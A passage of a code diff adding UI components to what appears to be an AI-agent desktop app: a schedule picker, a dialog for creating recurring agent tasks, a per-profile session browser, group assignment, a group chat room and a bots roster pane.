+      return `Runs every day at ${tl}` + cap
+    case 'weekdays':
+      return `Runs Monday\u2013Friday at ${tl}` + cap
+    case 'weekly':
+      return `Runs every ${(WEEKDAYS.find(w => w.id === state.weekday) || WEEKDAYS[0]).label} at ${tl}` + cap
+    case 'monthly':
+      return `Runs on day ${state.monthday || '1'} of each month at ${tl}` + cap
+    case 'interval':
+      return `Runs every ${Math.max(1, parseInt(state.intervalN, 10) || 1)} ${unitWord(state.intervalUnit)}` + cap
+    default:
+      return 'Raw schedule \u2014 every Nm/Nh/Nd or 5-field cron'
+  }
+}
+
+function pickerSelect(value, onChange, options) {
+  return jsxs(Select, {
+    value,
+    onValueChange: onChange,
+    children: [
+      jsx(SelectTrigger, { className: 'h-8 rounded-md', children: jsx(SelectValue, {}) }),
+      jsx(SelectContent, {
+        children: options.map(o => jsx(SelectItem, { value: o.id, children: o.label }, o.id))
+      })
+    ]
+  })
+}
+
+function SchedulePicker({ state, setState }) {
+  const upd = patch => setState(prev => ({ ...prev, ...patch }))
+  const needsTime = ['daily', 'weekdays', 'weekly', 'monthly'].includes(state.freq)
+
+  return jsxs('div', {
+    className: 'grid gap-2',
+    children: [
+      jsxs('div', {
+        style: { display: 'grid', gridTemplateColumns: needsTime ? '1fr 1fr' : '1fr', gap: '8px' },
+        children: [
+          pickerSelect(state.freq, v => upd({ freq: v }), FREQUENCIES),
+          needsTime ? pickerSelect(state.time, v => upd({ time: v }), TIMES) : null
+        ]
+      }),
+      state.freq === 'once'
+        ? jsxs('div', {
+            style: { display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '8px' },
+            children: [
+              jsx(Input, {
+                className: 'h-8',
+                placeholder: '30',
+                value: state.onceN,
+                onChange: event => upd({ onceN: event.target.value.replace(/[^0-9]/g, '').slice(0, 4) })
+              }),
+              pickerSelect(state.onceUnit, v => upd({ onceUnit: v }), [
+                { id: 'm', label: 'minutes from now' },
+                { id: 'h', label: 'hours from now' },
+                { id: 'd', label: 'days from now' }
+              ])
+            ]
+          })
+        : null,
+      state.freq === 'weekly'
+        ? pickerSelect(state.weekday, v => upd({ weekday: v }), WEEKDAYS)
+        : null,
+      state.freq === 'monthly'
+        ? labeled(
+            'Day of month',
+            jsx(Input, {
+              className: 'h-8',
+              placeholder: '1',
+              value: state.monthday,
+              onChange: event => upd({ monthday: event.target.value.replace(/[^0-9]/g, '').slice(0, 2) })
+            })
+          )
+        : null,
+      state.freq === 'interval'
+        ? jsxs('div', {
+            style: { display: 'grid', gridTemplateColumns: '1fr 1fr', gap: '8px' },
+            children: [
+              jsx(Input, {
+                className: 'h-8',
+                placeholder: '2',
+                value: state.intervalN,
+                onChange: event => upd({ intervalN: event.target.value.replace(/[^0-9]/g, '').slice(0, 4) })
+              }),
+              pickerSelect(state.intervalUnit, v => upd({ intervalUnit: v }), [
+                { id: 'm', label: 'minutes' },
+                { id: 'h', label: 'hours' },
+                { id: 'd', label: 'days' }
+              ])
+            ]
+          })
+        : null,
+      state.freq === 'advanced'
+        ? jsx(Input, {
+            className: 'h-8 font-mono text-xs',
+            placeholder: 'every 1d \u00b7 every 2h \u00b7 0 9 * * * (cron)',
+            value: state.raw,
+            onChange: event => upd({ raw: event.target.value })
+          })
+        : null,
+      state.freq !== 'once' && state.freq !== 'advanced'
+        ? jsxs('div', {
+            className: 'flex items-center gap-2',
+            children: [
+              jsx('span', { className: 'text-xs text-(--ui-text-tertiary)', children: 'Stop after' }),
+              jsx(Input, {
+                className: 'h-7 w-16 text-xs',
+                placeholder: '\u221e',
+                value: state.repeatN,
+                onChange: event => upd({ repeatN: event.target.value.replace(/[^0-9]/g, '').slice(0, 4) })
+              }),
+              jsx('span', { className: 'text-xs text-(--ui-text-tertiary)', children: 'runs (blank = forever)' })
+            ]
+          })
+        : null,
+      jsx('div', {
+        className: 'text-[0.65rem] text-(--ui-text-quaternary)',
+        children: `${scheduleSummary(state)} \u00b7 ${composeSchedule(state) || '\u2014'}`
+      })
+    ]
+  })
+}
+
+function defaultScheduleState() {
+  return { freq: 'daily', time: '9:0', weekday: '1', monthday: '1', intervalN: '2', intervalUnit: 'h', onceN: '30', onceUnit: 'm', repeatN: '', raw: '' }
+}
+
+function CreateRoutineDialog({ bot, open, onClose }) {
+  const [name, setName] = useState('')
+  const [instruction, setInstruction] = useState('')
+  const [sched, setSched] = useState(defaultScheduleState())
+  const [busy, setBusy] = useState(false)
+  const [error, setError] = useState(null)
+  const activeProfile = useValue(host.state.profile)
+  const schedule = composeSchedule(sched)
+
+  const reset = () => {
+    setName('')
+    setInstruction('')
+    setSched(defaultScheduleState())
+    setBusy(false)
+    setError(null)
+  }
+
+  const submit = async () => {
+    const title = name.trim()
+    const task = instruction.trim()
+    const inputError = routineInputError(title, task)
+
+    if (inputError) {
+      setError(inputError)
+      return
+    }
+
+    if (!title || !task || !schedule.trim() || busy) {
+      return
+    }
+
+    setBusy(true)
+    setError(null)
+
+    try {
+      const repeatN =
+        sched.freq !== 'once' && sched.freq !== 'advanced' && String(sched.repeatN || '').trim()
+          ? Math.max(1, parseInt(sched.repeatN, 10) || 1)
+          : null
+      await host.request('cron.manage', {
+        action: 'add',
+        name: `[bot:${bot}] ${title}`,
+        schedule: schedule.trim(),
+        prompt: routinePrompt(bot, title, task, activeProfile),
+        ...(bot ? { profile: bot } : {}),
+        ...(repeatN ? { repeat: repeatN } : {})
+      })
+      await invalidateRoutineOwner(bot)
+      host.notify({ kind: 'success', message: `Cronjob "${title}" scheduled` })
+      reset()
+      onClose()
+    } catch (err) {
+      setBusy(false)
+      setError(err instanceof Error ? err.message : String(err))
+    }
+  }
+
+  return jsx(Dialog, {
+    open,
+    onOpenChange: value => {
+      if (!value && !busy) {
+        reset()
+        onClose()
+      }
+    },
+    children: jsxs(DialogContent, {
+      className: 'max-w-md',
+      children: [
+        jsxs(DialogHeader, {
+          children: [
+            jsx(DialogTitle, { children: 'New Cronjob' }),
+            jsx(DialogDescription, {
+              children: `A recurring task ${displayName({ name: bot }, $botMeta.get()[bot])} runs on a schedule. Runs land in its own chat history.`
+            })
+          ]
+        }),
+        jsxs('div', {
+          className: 'grid gap-3.5',
+          children: [
+            labeled(
+              'Name',
+              jsx(Input, {
+                autoFocus: true,
+                placeholder: 'Name this cronjob',
+                value: name,
+                onChange: event => setName(event.target.value)
+              })
+            ),
+            labeled(
+              'Instruction',
+              jsx(Textarea, {
+                className: 'min-h-20',
+                placeholder: 'What should this cronjob do each time it runs?',
+                value: instruction,
+                onChange: event => setInstruction(event.target.value)
+              })
+            ),
+            labeled('When to run', jsx(SchedulePicker, { state: sched, setState: setSched })),
+            error
+              ? jsx('div', {
+                  className: 'rounded-md border border-(--ui-stroke-secondary) px-3 py-2 text-xs text-(--ui-accent)',
+                  children: error
+                })
+              : null
+          ]
+        }),
+        jsxs(DialogFooter, {
+          children: [
+            jsx(Button, {
+              variant: 'ghost',
+              disabled: busy,
+              onClick: () => {
+                reset()
+                onClose()
+              },
+              children: 'Cancel'
+            }),
+            jsx(Button, {
+              disabled: busy || !name.trim() || !instruction.trim() || !schedule.trim(),
+              onClick: submit,
+              children: busy ? 'Scheduling…' : 'Create Cronjob'
+            })
+          ]
+        })
+      ]
+    })
+  })
+}
+
+function RoutinesPane() {
+  const selected = useValue($selectedBot)
+  const gatewayProfile = useValue(host.state.profile)
+  // The tile maps to the bot you're chatting with: the live gateway profile
+  // is the truth once a chat opens; $selectedBot covers the gap between a
+  // roster click and the profile swap landing.
+  const bot = (gatewayProfile || selected || 'default').trim() || 'default'
+  const meta = useValue($botMeta)[bot]
+  const { shape, color, image } = botAppearance(bot, meta)
+  const { data, error, isLoading, refetch } = useRoutines(bot)
+  const [createOpen, setCreateOpen] = useState(false)
+  const [createOwner, setCreateOwner] = useState(null)
+  const createTarget = routineCreateTarget(createOwner, bot)
+
+  const openCreate = () => {
+    setCreateOwner(bot)
+    setCreateOpen(true)
+  }
+
+  const view = selectRoutineJobs(data, error, $lastJobs.get(), bot)
+  if (view.live) {
+    $lastJobs.set(view.live)
+  }
+  const jobs = view.jobs
+  const staleNotice = error && !view.live && view.all.length
+    ? 'Could not refresh cronjobs. Showing the last list we had.'
+    : null
+
+  return jsxs('div', {
+    className: 'flex h-full flex-col',
+    children: [
+      jsxs('div', {
+        className: 'flex items-center gap-2 px-3 pt-3 pb-2',
+        children: [
+          jsx(BotFace, { shape, color, image, size: 22, name: bot }),
+          jsxs('div', {
+            className: 'min-w-0 flex-1',
+            children: [
+              jsxs('div', {
+                className: 'flex min-w-0 items-baseline gap-1.5 truncate',
+                children: [
+                  jsx('div', {
+                    className: 'truncate text-xs font-semibold',
+                    children: displayName({ name: bot }, meta)
+                  }),
+                  showsHandle(bot, meta)
+                    ? jsx('span', {
+                        className: 'shrink-0 font-mono text-[0.65rem] text-(--ui-text-quaternary)',
+                        children: `@${botHandle(bot)}`
+                      })
+                    : null
+                ]
+              }),
+              jsx('div', {
+                className: 'text-[0.65rem] uppercase tracking-wider text-(--ui-text-quaternary)',
+                children: 'Cronjobs'
+              })
+            ]
+          }),
+          jsx(Tip, {
+            label: 'New Cronjob',
+            children: jsx('button', {
+              type: 'button',
+              className:
+                'flex size-6 shrink-0 items-center justify-center rounded-md text-(--ui-text-tertiary) transition-colors hover:bg-(--chrome-action-hover) hover:text-foreground',
+              onClick: openCreate,
+              children: jsx(Codicon, { name: 'add' })
+            })
+          })
+        ]
+      }),
+      jsx('div', { className: 'mx-3 border-t border-(--ui-stroke-secondary)' }),
+      staleNotice
+        ? jsx('div', {
+            className: 'mx-3 mt-2 rounded-md bg-(--chrome-action-hover) px-2 py-1.5 text-[0.6875rem] text-(--ui-text-tertiary)',
+            children: staleNotice
+          })
+        : null,
+      isLoading && !view.all.length
+        ? jsx('div', {
+            className: 'flex flex-1 items-center justify-center',
+            children: jsx(GlyphSpinner, { spinner: 'breathe', className: 'text-(--ui-text-tertiary)' })
+          })
+        : error && !view.all.length
+          ? jsxs('div', {
+              className: 'flex flex-1 flex-col items-center justify-center gap-3 px-4 text-center',
+              children: [
+                jsx(Codicon, { name: 'warning', className: 'text-[1.6rem] text-(--ui-text-quaternary)' }),
+                jsx('div', {
+                  className: 'text-xs leading-5 text-(--ui-text-tertiary)',
+                  children: 'Could not load cronjobs. The list may still be there.'
+                }),
+                jsx(Button, {
+                  variant: 'secondary',
+                  size: 'sm',
+                  onClick: () => void refetch(),
+                  children: 'Retry'
+                })
+              ]
+            })
+        : jobs.length === 0
+          ? jsxs('div', {
+              className: 'flex flex-1 flex-col items-center justify-center gap-3 px-4 text-center',
+              children: [
+                jsx(Codicon, { name: 'calendar', className: 'text-[1.6rem] text-(--ui-text-quaternary)' }),
+                jsx('div', {
+                  className: 'text-xs leading-5 text-(--ui-text-tertiary)',
+                  children: 'Cronjobs are recurring tasks this agent runs on a schedule.'
+                }),
+                jsx(Button, {
+                  variant: 'secondary',
+                  size: 'sm',
+                  onClick: openCreate,
+                  children: 'Create Cronjob'
+                })
+              ]
+            })
+          : jsx(ScrollArea, {
+              className: 'min-h-0 flex-1',
+              children: jsx('div', {
+                className: 'grid gap-1.5 px-2.5 py-2',
+                children: jobs.map(job => jsx(RoutineRow, { job, profile: bot }, job.job_id))
+              })
+            }),
+      jsx(CreateRoutineDialog, {
+        key: createTarget,
+        bot: createTarget,
+        open: createOpen,
+        onClose: () => {
+          setCreateOpen(false)
+          setCreateOwner(null)
+        }
+      })
+    ]
+  })
+}
+
+// ── profile session workspace ────────────────────────────────────────────────
+
+const PROFILE_SESSION_LIST_LIMIT = 200
+
+function openBotSessionsWorkspace(bot) {
+  if (bot?.name && NAME_RE.test(bot.name)) {
+    $botSessionsWorkspace.set(bot.name)
+  }
+}
+
+function filterProfileSessions(sessions, query) {
+  const needle = String(query || '').trim().toLowerCase()
+  const rows = Array.isArray(sessions) ? sessions : []
+  if (!needle) return rows
+  return rows.filter(session =>
+    `${session?.title || ''} ${session?.preview || ''} ${session?.source || ''}`.toLowerCase().includes(needle)
+  )
+}
+
+function useProfileSessions(botName, gatewayGeneration) {
+  return useQuery({
+    queryKey: [ID, 'profile-sessions', botName, gatewayGeneration],
+    enabled: Boolean(botName),
+    queryFn: () => host.request('session.list', { profile: botName, limit: PROFILE_SESSION_LIST_LIMIT }),
+    refetchInterval: 8000,
+    staleTime: 4000,
+    retry: false
+  })
+}
+
+async function openProfileSession(botName, storedId, gatewayGeneration) {
+  const profile = String(botName || '')
+  const id = String(storedId || '')
+  if (!NAME_RE.test(profile) || !id || gatewayGeneration !== $sessionsGatewayGeneration.get()) return
+  if (typeof host.openSession !== 'function') {
+    throw new Error('This Hermes Desktop version cannot open stored sessions')
+  }
+  await host.openSession(id, { profile })
+  if (gatewayGeneration !== $sessionsGatewayGeneration.get()) return
+  $botSelectedSessions.set({ ...$botSelectedSessions.get(), [profile]: id })
+}
+
+function ProfileSessionRow({ session, botName, active, gatewayGeneration }) {
+  return jsxs('button', {
+    type: 'button',
+    'aria-current': active ? 'page' : undefined,
+    onClick: () => void openProfileSession(botName, session.id, gatewayGeneration).catch(err => host.notifyError(err, 'Could not open session')),
+    className: cn(
+      'flex w-full flex-col gap-0.5 overflow-hidden rounded-md px-2 py-1.5 text-left transition-colors',
+      'hover:bg-(--chrome-action-hover)',
+      active && 'bg-(--ui-row-active-background)'
+    ),
+    children: [
+      jsx('span', {
+        className: 'truncate text-[0.8125rem] font-medium',
+        children: session.title || 'Untitled session'
+      }),
+      jsx('div', {
+        className: 'truncate text-[0.7rem] text-(--ui-text-tertiary)',
+        children: session.preview || session.source || 'No messages yet'
+      })
+    ]
+  })
+}
+
+function ProfileSessionsWorkspace({ bot }) {
+  const gatewayGeneration = useValue($sessionsGatewayGeneration)
+  const { data, isLoading, error } = useProfileSessions(bot.name, gatewayGeneration)
+  const selectedByProfile = useValue($botSelectedSessions)
+  const [query, setQuery] = useState('')
+  const sourceSessions = data?.sessions || []
+  const sessions = filterProfileSessions(sourceSessions, query)
+  const inventoryBounded = sourceSessions.length >= PROFILE_SESSION_LIST_LIMIT
+  const selectedId = selectedByProfile[bot.name] || ''
+
+  const header = jsxs('div', {
+    className: 'flex items-center gap-2 px-2.5 pt-2.5 pb-2',
+    children: [
+      jsx(Button, {
+        variant: 'ghost',
+        size: 'sm',
+        onClick: () => $botSessionsWorkspace.set(null),
+        children: 'Back'
+      }),
+      jsx('div', {
+        className: 'min-w-0 flex-1 truncate text-sm font-semibold',
+        children: `${displayName(bot, $botMeta.get()[bot.name])} sessions`
+      })
+    ]
+  })
+
+  return jsxs('div', {
+    className: 'flex h-full flex-col',
+    children: [
+      header,
+      jsx('div', {
+        className: 'px-2 pb-2',
+        children: jsx(Input, {
+          'aria-label': 'Filter sessions',
+          placeholder: 'Filter sessions…',
+          value: query,
+          onChange: event => setQuery(event.target.value)
+        })
+      }),
+      inventoryBounded
+        ? jsx('div', {
+            className: 'px-2.5 pb-2 text-[0.65rem] text-(--ui-text-quaternary)',
+            children: `Showing the ${PROFILE_SESSION_LIST_LIMIT} most recent sessions.`
+          })
+        : null,
+      isLoading
+        ? jsx('div', {
+            className: 'flex flex-1 items-center justify-center',
+            children: jsx(GlyphSpinner, { spinner: 'breathe' })
+          })
+        : error
+          ? jsx('div', {
+              className: 'px-3 py-3 text-xs text-(--ui-text-tertiary)',
+              children: 'Could not load sessions for this profile.'
+            })
+          : jsx(ScrollArea, {
+              className: 'min-h-0 flex-1',
+              children: jsx('div', {
+                className: 'grid gap-0.5 px-1.5 pb-2',
+                children: sessions.length
+                  ? sessions.map(session => jsx(ProfileSessionRow, {
+                      session,
+                      botName: bot.name,
+                      active: selectedId === session.id,
+                      gatewayGeneration
+                    }, session.id))
+                  : jsx('div', {
+                      className: 'px-2 py-3 text-center text-xs text-(--ui-text-tertiary)',
+                      children: query.trim()
+                        ? inventoryBounded
+                          ? `No matching sessions in the ${PROFILE_SESSION_LIST_LIMIT} most recent.`
+                          : 'No sessions match that filter.'
+                        : 'No stored sessions yet.'
+                    })
+              })
+            })
+    ]
+  })
+}
+
+// ── roster pane ──────────────────────────────────────────────────────────────
+
+/** "Active now" presence strip above the roster: chips for every bot that is
+ *  working right now (the gateway-busy selected profile + bots whose last
+ *  message landed inside the liveness window). Reuses the row avatar; each
+ *  chip opens that bot's canonical Bot Chat. Omitted entirely when nothing
+ *  is active, and never reorders the roster below it. */
+function ActiveNowStrip({ roster, activeProfile, gatewayState, metaByName, onOpen }) {
+  const active = activeBots(roster, activeProfile, gatewayState)
+
+  if (!active.length) {
+    return null
+  }
+
+  return jsxs('div', {
+    role: 'status',
+    'aria-live': 'polite',
+    'aria-label': 'Active now',
+    className: 'flex flex-wrap items-center gap-1.5 px-2.5 pb-1.5',
+    children: [
+      jsx('span', {
+        className: 'text-[0.6875rem] font-semibold uppercase tracking-wider text-(--ui-text-quaternary)',
+        children: 'Active now'
+      }),
+      ...active.map(bot => {
+        const meta = metaByName?.[bot.name]
+        const { shape, color, image } = botAppearance(bot.name, meta)
+        const photo = Boolean(image && !isBackfilledFacePng(image))
+        const label = displayName(bot, meta)
+
+        return jsx('button', {
+          type: 'button',
+          title: `Open ${label}'s chat`,
+          className: cn(
+            'flex items-center gap-1.5 rounded-md bg-(--chrome-action-hover) px-1.5 py-1 text-left transition-colors',
+            'hover:bg-(--chrome-action-hover) hover:text-foreground'
+          ),
+          onClick: () => onOpen(bot),
+          children: [
+            jsx(BotFace, {
+              shape,
+              color,
+              image: photo ? image : null,
+              size: 24,
+              name: bot.name,
+              mood: 'work'
+            }),
+            jsx('span', {
+              className: 'max-w-28 truncate text-xs font-medium',
+              children: label
+            })
+          ]
+        }, bot.name)
+      })
+    ]
+  })
+}
+
+/** Assign a bot to a group (or clear it). Existing groups are one-click;
+ *  the input creates a new one. The group is a bot-meta field, so it syncs
+ *  cross-machine via ui_meta like pin/title. */
+function GroupDialog({ bot, onClose }) {
+  const meta = useValue($botMeta)
+  const [name, setName] = useState('')
+  const current = (meta[bot?.name]?.group || '').trim()
+  const groups = knownGroups(meta)
+
+  const assign = group => {
+    saveBotMeta(bot.name, { group: group || null })
+    host.notify({
+      kind: 'info',
+      message: group
+        ? `${displayName(bot, meta[bot.name])} moved to “${group}”`
+        : `${displayName(bot, meta[bot.name])} removed from its group`
+    })
+    onClose()
+  }
+
+  return jsx(Dialog, {
+    open: Boolean(bot),
+    onOpenChange: value => {
+      if (!value) {
+        onClose()
+      }
+    },
+    children: jsxs(DialogContent, {
+      className: 'max-w-sm',
+      children: [
+        jsxs(DialogHeader, {
+          children: [
+            jsx(DialogTitle, { children: 'Move to group' }),
+            jsx(DialogDescription, {
+              children: 'Groups render as labeled sections in the Bots roster and sync to every machine.'
+            })
+          ]
+        }),
+        groups.length
+          ? jsx('div', {
+              className: 'flex flex-wrap gap-1.5',
+              children: groups.map(group =>
+                jsx(Button, {
+                  variant: group === current ? 'default' : 'secondary',
+                  size: 'sm',
+                  onClick: () => assign(group),
+                  children: group
+                }, group)
+              )
+            })
+          : null,
+        jsxs('form', {
+          className: 'flex items-center gap-1.5',
+          onSubmit: event => {
+            event.preventDefault()
+            const trimmed = name.trim()
+
+            if (trimmed) {
+              assign(trimmed)
+            }
+          },
+          children: [
+            jsx(Input, {
+              autoFocus: true,
+              placeholder: groups.length ? 'New group…' : 'Group name (e.g. Research)',
+              value: name,
+              onChange: event => setName(event.target.value)
+            }),
+            jsx(Button, { type: 'submit', size: 'sm', disabled: !name.trim(), children: 'Create' })
+          ]
+        }),
+        current
+          ? jsx(Button, {
+              variant: 'ghost',
+              size: 'sm',
+              className: 'justify-self-start',
+              onClick: () => assign(null),
+              children: `Remove from “${current}”`
+            })
+          : null
+      ]
+    })
+  })
+}
+
+/** Merged room view for one group: shared timeline with per-member
+ *  attribution, a composer that drives the round-robin, and a working
+ *  indicator while member turns run. */
+function GroupChatWorkspace({ group, members }) {
+  const rooms = useValue($groupChats)
+  const allMeta = useValue($botMeta)
+  const room = rooms[group] || { log: [], running: false }
+  const [draft, setDraft] = useState('')
+
+  const header = jsxs('div', {
+    className: 'flex items-center gap-2 px-2.5 pt-2.5 pb-2',
+    children: [
+      jsx(Button, {
+        variant: 'ghost',
+        size: 'sm',
+        onClick: () => $groupChatWorkspace.set(null),
+        children: 'Back'
+      }),
+      jsx('div', {
+        className: 'min-w-0 flex-1 truncate text-sm font-semibold',
+        children: `${group} — group chat`
+      }),
+      jsx('span', {
+        className: 'shrink-0 text-[0.65rem] text-(--ui-text-quaternary)',
+        children: `${members.length} bots`
+      })
+    ]
+  })
+
+  const submit = () => {
+    const text = draft.trim()
+
+    if (!text) {
+      return
+    }
+
+    setDraft('')
+    sendToGroupChat(group, members.map(b => ({ name: b.name, title: allMeta[b.name]?.title || '' })), text)
+  }
+
+  return jsxs('div', {
+    className: 'flex h-full flex-col',
+    children: [
+      header,
+      jsx(ScrollArea, {
+        className: 'min-h-0 flex-1',
+        children: jsxs('div', {
+          className: 'grid gap-1.5 px-2.5 pb-2',
+          children: [
+            ...(room.log.length
+              ? room.log.map((entry, index) => {
+                  const isUser = entry.from.kind === 'user'
+                  const meta = isUser ? null : allMeta[entry.from.name]
+                  const label = isUser
+                    ? 'You'
+                    : meta?.title
+                      ? `${meta.title} (@${entry.from.name})`
+                      : `@${entry.from.name}`
+
+                  return jsxs('div', {
+                    className: isUser ? 'rounded-md bg-(--chrome-action-hover) px-2 py-1.5' : 'px-2 py-1',
+                    children: [
+                      jsxs('div', {
+                        className: 'flex items-baseline gap-2',
+                        children: [
+                          jsx('span', {
+                            className: isUser
+                              ? 'text-[0.7rem] font-semibold text-foreground'
+                              : 'text-[0.7rem] font-semibold text-(--ui-accent,#4f9cf9)',
+                            children: label
+                          }),
+                          jsx('span', {
+                            className: 'text-[0.625rem] text-(--ui-text-quaternary)',
+                            children: relativeTime(entry.at)
+                          })
+                        ]
+                      }),
+                      jsx('div', {
+                        className: 'whitespace-pre-wrap text-xs text-(--ui-text-secondary)',
+                        children: entry.text
+                      })
+                    ]
+                  }, `${entry.at}:${index}`)
+                })
+              : [
+                  jsx('div', {
+                    className: 'px-2 py-4 text-center text-xs text-(--ui-text-tertiary)',
+                    children: 'Say something — every bot in this group hears the room.'
+                  }, 'empty')
+                ]),
+            room.running
+              ? jsx('div', {
+                  className: 'px-2 py-1 text-[0.7rem] italic text-(--ui-text-quaternary)',
+                  children: 'The room is working…'
+                }, 'working')
+              : null
+          ]
+        })
+      }),
+      jsx('div', {
+        className: 'border-t border-(--ui-stroke-secondary) p-2',
+        children: jsxs('form', {
+          className: 'flex items-center gap-1.5',
+          onSubmit: event => {
+            event.preventDefault()
+            submit()
+          },
+          children: [
+            jsx(Input, {
+              'aria-label': `Message ${group}`,
+              placeholder: `Message ${group}… (@name to direct, @everyone for all)`,
+              value: draft,
+              onChange: event => setDraft(event.target.value)
+            }),
+            jsx(Button, { type: 'submit', size: 'sm', disabled: !draft.trim(), children: 'Send' })
+          ]
+        })
+      })
+    ]
+  })
+}
+
+function BotsPane() {
+  const { data, error, isLoading, refetch } = useRoster()
+  const gatewayState = useValue(host.state.gateway)
+  const gatewayUp = gatewayState === 'open'
+  const activeProfile = (useValue(host.state.profile) || 'default').trim() || 'default'
+  const [createOpen, setCreateOpen] = useState(false)
+  const [editing, setEditing] = useState(null)
+  const [deleting, setDeleting] = useState(null)
+  const [grouping, setGrouping] = useState(null)
+  const [query, setQuery] = useState('')
+  const hideBotChats = useValue($hideBotChats)
+  const activityToasts = useValue($activityToasts)
+  const sessionsWorkspaceName = useValue($botSessionsWorkspace)
+  const groupChatName = useValue($groupChatWorkspace)
+  const groupNeedsYou = useValue($groupNeedsYou)
+
+  // The socket opening (boot, SSH reconnect, sleep/wake) is the signal to
+  // retry immediately instead of waiting out the poll interval.
+  useEffect(() => {
+    if (gatewayUp) {
+      void refetch()
+    }
+  }, [gatewayUp, refetch])
+  const allMeta = useValue($botMeta)
+  // Messaging-app order: most recent activity first, where "activity" is
+  // the newest of (bot created, last message in any of its sessions). A
+  // freshly created bot tops the list until another bot gets a message.
+  // No special slot for the primary bot — it competes on recency too.
+  const activityOf = bot => {
+    const created = allMeta[bot.name]?.created || bot.ui_meta?.['hermes-bots']?.created || 0
+    const lastMsg = (bot.last_session?.last_active || 0) * 1000
+
+    return Math.max(created, lastMsg)
+  }
+  // Pinned bots (right-click → Pin) float to the top as a group; within the
+  // pinned group and within the unpinned group, recency still rules. A
+  // plain boolean flag in bot-meta (rides ui_meta to every machine).
+  const isPinned = bot => Boolean(allMeta[bot.name]?.pinned)
+  // Resilience (@wesleysimplicio, #13): a failed refresh must not erase a
+  // roster the user already had — mixed local+cloud gateways and remotes
+  // waking from sleep fail transiently. Render the last good snapshot with
+  // a notice; the full error card is reserved for "never had a roster".
+  const live = Array.isArray(data?.profiles) ? data.profiles : null
+  const source = live ?? (error ? $lastRoster.get() : [])
+  const roster = source.slice().sort((a, b) => {
+    const pa = isPinned(a) ? 1 : 0
+    const pb = isPinned(b) ? 1 : 0
+
+    if (pa !== pb) {
+      return pb - pa
+    }
+
+    return activityOf(b) - activityOf(a)
+  })
+  const filteredRoster = filterBots(roster, allMeta, query)
+
+  if (live) {
+    $lastRoster.set(roster)
+    mergeServerMeta(live)
+    pullServerAvatars(live)
+    trackInboundActivity(live)
+    backfillMessagingProtocol(live)
+  }
+
+  const staleNotice = error && !live && roster.length
+    ? 'Roster refresh failed — showing the last good list.' + (gatewayUp ? '' : ' Waiting for the gateway to reconnect…')
+    : null
+  const sessionsWorkspaceBot = roster.find(bot => bot.name === sessionsWorkspaceName)
+
+  if (sessionsWorkspaceBot) {
+    return jsx(ProfileSessionsWorkspace, { bot: sessionsWorkspaceBot })
+  }
+
+  const groupChatMembers = groupChatName
+    ? roster.filter(bot => (allMeta[bot.name]?.group || '').trim() === groupChatName)
+    : []
+
+  if (groupChatName && groupChatMembers.length) {
+    return jsx(GroupChatWorkspace, { group: groupChatName, members: groupChatMembers })
+  }
+
+  return jsxs('div', {
+    className: 'flex h-full flex-col',
+    children: [
+      jsxs('div', {
+        className: 'flex items-center justify-between gap-2 px-2.5 pt-2.5 pb-1.5',
+        children: [
+          jsx('span', {
+            className: 'text-[0.6875rem] font-semibold uppercase tracking-wider text-(--ui-text-quaternary)',
+            children: 'Bots'
+          }),
+          jsxs('div', {
+            className: 'flex items-center gap-0.5',
+            children: [
+              jsx(Tip, {
+                label: activityToasts ? 'Activity toasts on — click to silence' : 'Activity toasts off — click to enable',
+                children: jsx('button', {
+                  type: 'button',
+                  className:
+                    'flex size-6 items-center justify-center rounded-md text-(--ui-text-tertiary) transition-colors hover:bg-(--chrome-action-hover) hover:text-foreground',
+                  onClick: () => setActivityToasts(!activityToasts),
+                  children: jsx(Codicon, { name: activityToasts ? 'bell' : 'bell-slash' })
+                })
+              }),
+              jsx(Tip, {
+                label: hideBotChats ? 'Bot Chats hidden from Sessions — click to show' : 'Bot Chats shown in Sessions — click to hide',
+                children: jsx('button', {
+                  type: 'button',
+                  className:
+                    'flex size-6 items-center justify-center rounded-md text-(--ui-text-tertiary) transition-colors hover:bg-(--chrome-action-hover) hover:text-foreground',
+                  onClick: () => void setHideBotChats(!hideBotChats),
+                  children: jsx(Codicon, { name: hideBotChats ? 'eye-closed' : 'eye' })
+                })
+              }),
+              jsx(Tip, {
+                label: 'New Agent',
+                children: jsx('button', {
+                  type: 'button',
+                  className:
+                    'flex size-6 items-center justify-center rounded-md text-(--ui-text-tertiary) transition-colors hover:bg-(--chrome-action-hover) hover:text-foreground',
+                  onClick: () => setCreateOpen(true),
+                  children: jsx(Codicon, { name: 'add' })
+                })
+              })
+            ]
+          })
+        ]
+      }),
+      jsx(ActiveNowStrip, {
+        roster,
+        activeProfile,
+        gatewayState,
+        metaByName: allMeta,
+        onOpen: bot => {
+          haptic('tap')
+          $selectedBot.set(bot.name)
+
+          if ($botUnread.get()[bot.name]) {
+            const next = { ...$botUnread.get() }
+            delete next[bot.name]
+            $botUnread.set(next)
+          }
+
+          void openBotCanonicalChat(bot.name, allMeta[bot.name]?.chat).catch(() => {
+            if (typeof host.newChat === 'function') {
+              host.newChat(bot.name)
+            }
+          })
+        }
+      }),
+      roster.length
+        ? jsx('div', {
+            className: 'px-2.5 pb-1.5',
+            children: jsx(SearchField, {
+              'aria-label': 'Search bots',
+              containerClassName: 'w-full',
+              inputClassName: 'w-full',
+              placeholder: 'Search bots…',
+              value: query,
+              onChange: setQuery
+            })
+          })
+        : null,
+      staleNotice
+        ? jsx('div', {
+            className: 'mx-2.5 mb-1 rounded-md bg-(--chrome-action-hover) px-2 py-1.5 text-[0.6875rem] text-(--ui-text-tertiary)',
+            children: staleNotice
+          })
+        : null,
+      isLoading && !roster.length
+        ? jsx('div', {
+            className: 'flex flex-1 items-center justify-center',
+            children: jsx(GlyphSpinner, { spinner: 'breathe', className: 'text-(--ui-text-tertiary)' })
+          })
+        : error && !roster.length
+          ? jsxs('div', {
+              className: 'grid gap-2 px-3 py-4 text-xs text-(--ui-text-tertiary)',
+              children: [
+                jsx('div', {
+                  children: gatewayUp
+                    ? `Roster unavailable: ${error instanceof Error ? error.message : 'gateway error'}. If your gateway predates profiles.list, update Hermes and restart the gateway.`
+                    : 'Waiting for the gateway connection… (remote gateways can take a few seconds; retries automatically)'
+                }),
+                jsx(Button, {
+                  variant: 'secondary',
+                  size: 'sm',
+                  className: 'justify-self-start',
+                  onClick: () => void refetch(),
+                  children: 'Retry now'
+                })
+              ]
+            })
+          : roster.length === 0
+            ? jsx(EmptyState, {
+                icon: 'hubot',
+                title: 'No agents yet',
+                description: 'Create your first teammate.'
+              })
+            : filteredRoster.length === 0
+              ? jsx('div', {
+                  'aria-live': 'polite',
+                  className:
